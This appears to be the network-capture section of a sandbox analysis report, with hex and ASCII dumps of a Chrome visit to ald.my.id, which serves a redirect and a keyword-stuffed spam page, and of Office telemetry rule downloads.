                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=2c9ae318eca212bf3b3eaa782940d04f
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:30 UTC469INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          x-powered-by: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          content-length: 222
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:30 GMT
                                                                                                                                                                                                                                                                                                                                                                          server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:30 UTC222INData Raw: 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 31 3b 55 52 4c 3d 2f 22 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 3b 20 22 3e 0a 09 09 3c 70 3e 50 6c 65 61 73 65 20 77 61 69 74 2e 2e 2e 2e 09 3c 2f 70 3e 0a 09 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <html><head><meta http-equiv="refresh" content="1;URL=/"><meta name="viewport" content="width=device-width, initial-scale=1"></head><body style="text-align:center; "><p>Please wait....</p></body></html>


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          9192.168.2.749721198.252.106.1474432816C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:31 UTC746OUTGET / HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: ald.my.id
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://ald.my.id/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          Cookie: PHPSESSID=2c9ae318eca212bf3b3eaa782940d04f
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:31 UTC476INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          x-powered-by: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          cache-control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          content-type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          transfer-encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          date: Mon, 14 Oct 2024 09:12:31 GMT
                                                                                                                                                                                                                                                                                                                                                                          server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:31 UTC892INData Raw: 63 37 37 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 69 72 3d 22 6c 74 72 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 32 30 30 35 2f 67 6d 6c 2f 62 22 20 78 6d 6c 6e 73 3a 64 61 74 61 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 32 30 30 35 2f 67 6d 6c 2f 64 61 74 61 22 20 78 6d 6c 6e 73 3a 65 78 70 72 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 32 30 30 35 2f 67 6d 6c 2f 65 78 70 72 22 3e 0a 3c 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 3e 0a 20 20 2f 2f 3c 21 5b 43 44 41 54 41 5b 0a 76 61 72 20 61 72 73 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: c779<!DOCTYPE html><html dir="ltr" xmlns="http://www.w3.org/1999/xhtml" xmlns:b="http://www.google.com/2005/gml/b" xmlns:data="http://www.google.com/2005/gml/data" xmlns:expr="http://www.google.com/2005/gml/expr"><head><script> //<![CDATA[var ars
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:31 UTC14994INData Raw: 70 6e 67 22 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 3e 0a 3c 21 2d 2d 20 43 68 72 6f 6d 65 2c 20 46 69 72 65 66 6f 78 20 4f 53 20 61 6e 64 20 4f 70 65 72 61 20 2d 2d 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 3e 0a 3c 21 2d 2d 20 57 69 6e 64 6f 77 73 20 50 68 6f 6e 65 20 2d 2d 3e 0a 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6d 73 61 70 70 6c 69 63 61 74 69 6f 6e 2d 6e 61 76 62 75 74 74 6f 6e 2d 63 6f 6c 6f 72 22 3e 0a 3c 6d 65 74 61 20 63 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: png" property="og:image"><meta content="text/html; charset=UTF-8" http-equiv="Content-Type">... Chrome, Firefox OS and Opera --><meta content="" name="theme-color">... Windows Phone --><meta content="" name="msapplication-navbutton-color"><meta co
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:31 UTC16384INData Raw: 72 20 69 6e 73 75 72 61 6e 63 65 20 63 6f 6d 70 61 72 65 0a 6d 6f 74 6f 72 20 76 65 68 69 63 6c 65 20 69 6e 73 75 72 61 6e 63 65 0a 62 65 73 74 20 63 61 72 20 69 6e 73 75 72 61 6e 63 65 0a 6d 6f 74 6f 72 20 69 6e 73 75 72 61 6e 63 65 20 6f 6e 6c 69 6e 65 20 71 75 6f 74 65 0a 63 61 72 20 69 6e 73 75 72 61 6e 63 65 20 6f 6e 6c 69 6e 65 20 71 75 6f 74 65 0a 6c 69 66 65 20 69 6e 73 75 72 61 6e 63 65 20 6f 6e 6c 69 6e 65 0a 73 75 70 70 6c 65 6d 65 6e 74 61 6c 20 68 65 61 6c 74 68 20 69 6e 73 75 72 61 6e 63 65 0a 62 65 73 74 20 63 61 72 20 69 6e 73 75 72 61 6e 63 65 20 72 61 74 65 73 0a 63 61 72 20 69 6e 73 75 72 61 6e 63 65 20 64 69 73 63 6f 75 6e 74 73 0a 6d 6f 74 6f 72 20 76 65 68 69 63 6c 65 20 69 6e 73 75 72 61 6e 63 65 20 71 75 6f 74 65 73 0a 61 75 74 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: r insurance comparemotor vehicle insurancebest car insurancemotor insurance online quotecar insurance online quotelife insurance onlinesupplemental health insurancebest car insurance ratescar insurance discountsmotor vehicle insurance quotesauto
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:32 UTC16384INData Raw: 74 6f 72 0a 63 72 65 64 69 74 20 63 61 72 64 20 62 61 6c 61 6e 63 65 0a 63 72 65 64 69 74 20 63 61 72 64 20 6e 75 6d 62 65 72 73 0a 63 72 65 64 69 74 20 63 61 72 64 20 74 72 61 6e 73 66 65 72 0a 63 72 65 64 69 74 20 63 61 72 64 20 69 6e 74 65 72 65 73 74 20 72 61 74 65 73 0a 63 72 65 64 69 74 20 63 61 72 64 20 69 6e 74 65 72 65 73 74 0a 67 6f 6c 64 20 63 61 72 64 0a 63 72 65 64 69 74 20 63 61 72 64 20 6f 6e 6c 69 6e 65 0a 62 65 73 74 20 72 61 74 65 20 63 72 65 64 69 74 20 63 61 72 64 73 0a 63 72 65 64 69 74 20 63 61 72 64 20 6c 6f 77 20 69 6e 74 65 72 65 73 74 0a 76 69 73 61 20 63 61 72 64 20 6f 6e 6c 69 6e 65 0a 6f 6e 6c 69 6e 65 20 63 72 65 64 69 74 20 63 61 72 64 0a 68 6f 77 20 74 6f 20 61 70 70 6c 79 20 61 20 63 72 65 64 69 74 20 63 61 72 64 0a 30 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: torcredit card balancecredit card numberscredit card transfercredit card interest ratescredit card interestgold cardcredit card onlinebest rate credit cardscredit card low interestvisa card onlineonline credit cardhow to apply a credit card0
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:32 UTC2419INData Raw: 6b 27 7d 7d 2c 20 7b 27 6e 61 6d 65 27 3a 20 27 74 65 6d 70 6c 61 74 65 27 2c 20 27 64 61 74 61 27 3a 20 7b 27 6e 61 6d 65 27 3a 20 27 63 75 73 74 6f 6d 27 2c 20 27 6c 6f 63 61 6c 69 7a 65 64 4e 61 6d 65 27 3a 20 27 43 75 73 74 6f 6d 27 2c 20 27 69 73 52 65 73 70 6f 6e 73 69 76 65 27 3a 20 74 72 75 65 2c 20 27 69 73 41 6c 74 65 72 6e 61 74 65 52 65 6e 64 65 72 69 6e 67 27 3a 20 66 61 6c 73 65 2c 20 27 69 73 43 75 73 74 6f 6d 27 3a 20 74 72 75 65 7d 7d 2c 20 7b 27 6e 61 6d 65 27 3a 20 27 76 69 65 77 27 2c 20 27 64 61 74 61 27 3a 20 7b 27 63 6c 61 73 73 69 63 27 3a 20 7b 27 6e 61 6d 65 27 3a 20 27 63 6c 61 73 73 69 63 27 2c 20 27 75 72 6c 27 3a 20 27 3f 76 69 65 77 5c 78 33 64 63 6c 61 73 73 69 63 27 7d 2c 20 27 66 6c 69 70 63 61 72 64 27 3a 20 7b 27 6e 61
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: k'}}, {'name': 'template', 'data': {'name': 'custom', 'localizedName': 'Custom', 'isResponsive': true, 'isAlternateRendering': false, 'isCustom': true}}, {'name': 'view', 'data': {'classic': {'name': 'classic', 'url': '?view\x3dclassic'}, 'flipcard': {'na
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                          10192.168.2.74972213.107.246.60443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:31 UTC195OUTGET /rules/other-Win32-v19.bundle HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                                                                                                          Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:31 UTC540INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Mon, 14 Oct 2024 09:12:31 GMT
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/plain
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 218853
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: public
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Sun, 13 Oct 2024 10:59:53 GMT
                                                                                                                                                                                                                                                                                                                                                                          ETag: "0x8DCEB762AD2C54E"
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 88bd8b3f-d01e-0049-5d65-1de7dc000000
                                                                                                                                                                                                                                                                                                                                                                          x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                                                                                                          x-azure-ref: 20241014T091231Z-17db6f7c8cf9wwz8ehu7c5p33g00000003fg00000000467a
                                                                                                                                                                                                                                                                                                                                                                          x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:31 UTC15844INData Raw: 31 30 30 30 76 35 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 30 22 20 56 3d 22 35 22 20 44 43 3d 22 45 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 52 75 6c 65 45 72 72 6f 72 73 41 67 67 72 65 67 61 74 65 64 22 20 41 54 54 3d 22 66 39 39 38 63 63 35 62 61 34 64 34 34 38 64 36 61 31 65 38 65 39 31 33 66 66 31 38 62 65 39 34 2d 64 64 31 32 32 65 30 61 2d 66 63 66 38 2d 34 64 63 35 2d 39 64 62 62 2d 36 61 66 61 63 35 33 32 35 31 38 33 2d 37 34 30 35 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 53 3d 22 37 30 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 50 53 50 20 50 53 55 22 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 1000v5+<?xml version="1.0" encoding="utf-8"?><R Id="1000" V="5" DC="ESM" EN="Office.Telemetry.RuleErrorsAggregated" ATT="f998cc5ba4d448d6a1e8e913ff18be94-dd122e0a-fcf8-4dc5-9dbb-6afac5325183-7405" SP="CriticalBusinessImpact" S="70" DL="A" DCa="PSP PSU"
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:31 UTC16384INData Raw: 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 34 30 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 42 22 20 49 3d 22 35 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 4f 20 54 3d 22 41 4e 44 22 3e 0d 0a 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: "0" /> </L> <R> <V V="400" T="I32" /> </R> </O> </R> </O> </C> <C T="B" I="5" O="false"> <O T="AND"> <L> <O T="GE"> <L> <S T="1" F="0" />
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:31 UTC16384INData Raw: 20 20 3c 53 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 31 22 20 2f 3e 0d 0a 20 20 3c 2f 53 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 38 32 30 76 33 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 38 32 30 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 43 6f 6e 74 61 63 74 43 61 72 64 50 72 6f 70 65 72 74 69 65 73 43 6f 75 6e 74 73 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <ST> <S T="1" /> </ST></R><$!#>10820v3+<?xml version="1.0" encoding="utf-8"?><R Id="10820" V="3" DC="SM" EN="Office.Outlook.Desktop.ContactCardPropertiesCounts" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-781
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:32 UTC16384INData Raw: 20 54 3d 22 55 36 34 22 20 49 3d 22 38 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 45 76 65 6e 74 73 5f 41 76 67 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 46 3d 22 41 76 65 72 61 67 65 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 39 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 41 67 65 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 30 22 20 4f 3d 22 74 72 75 65 22 20 4e 3d 22 50 75 72 67 65 64 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 43 6f 75 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: T="U64" I="8" O="false" N="Events_Avg"> <S T="2" F="Average" /> </C> <C T="U32" I="9" O="true" N="Purged_Age"> <S T="4" F="Count" /> </C> <C T="U32" I="10" O="true" N="Purged_Count"> <S T="5" F="Count" /> </C> <C T="U32"
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:32 UTC16384INData Raw: 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 50 65 72 73 6f 6e 61 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 5f 43 72 65 61 74 65 43 61 72 64 5f 56 61 6c 69 64 4d 61 6e 61 67 65 72 5f 46 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: "0" O="false" N="Count_CreateCard_ValidPersona_False"> <C> <S T="10" /> </C> </C> <C T="U32" I="1" O="false" N="Count_CreateCard_ValidManager_False"> <C> <S T="11" /> </C> </C> <C T="U32" I="2" O="false" N="Co
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:32 UTC16384INData Raw: 20 20 20 20 3c 53 20 54 3d 22 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 39 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 57 61 73 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 50 61 69 6e 74 5f 49 4d 73 6f 50 65 72 73 6f 6e 61 5f 4e 75 6c 6c 5f 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <S T="31" /> </C> </C> <C T="U32" I="19" O="false" N="Paint_IMsoPersona_WasNull_Count"> <C> <S T="32" /> </C> </C> <C T="U32" I="20" O="false" N="Paint_IMsoPersona_Null_Count"> <C> <S T="33" /> </C>
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:32 UTC16384INData Raw: 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63 6f 6e 64 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 32 30 30 22 20 54 3d 22 49 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 52 65 74 72 69 65 76 61 6c 4d 69 6c 6c 69 73 65 63
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <S T="3" F="RetrievalMilliseconds" /> </L> <R> <V V="200" T="I64" /> </R> </O> </L> <R> <O T="LT"> <L> <S T="3" F="RetrievalMillisec
                                                                                                                                                                                                                                                                                                                                                                          2024-10-14 09:12:32 UTC16384INData Raw: 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e 74 65 67 72 61 74 69 6f 6e 46 69 72 73 74 43 61 6c 6c 53 75 63 63 65 73 73 43 6f 75 6e 74 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 31 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 4f 63 6f 6d 32 49 55 43 4f 66 66 69 63 65 49 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: R> <V V="0" T="I32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="Ocom2IUCOfficeIntegrationFirstCallSuccessCount"> <C> <S T="9" /> </C> </C> <C T="U32" I="1" O="false" N="Ocom2IUCOfficeIn
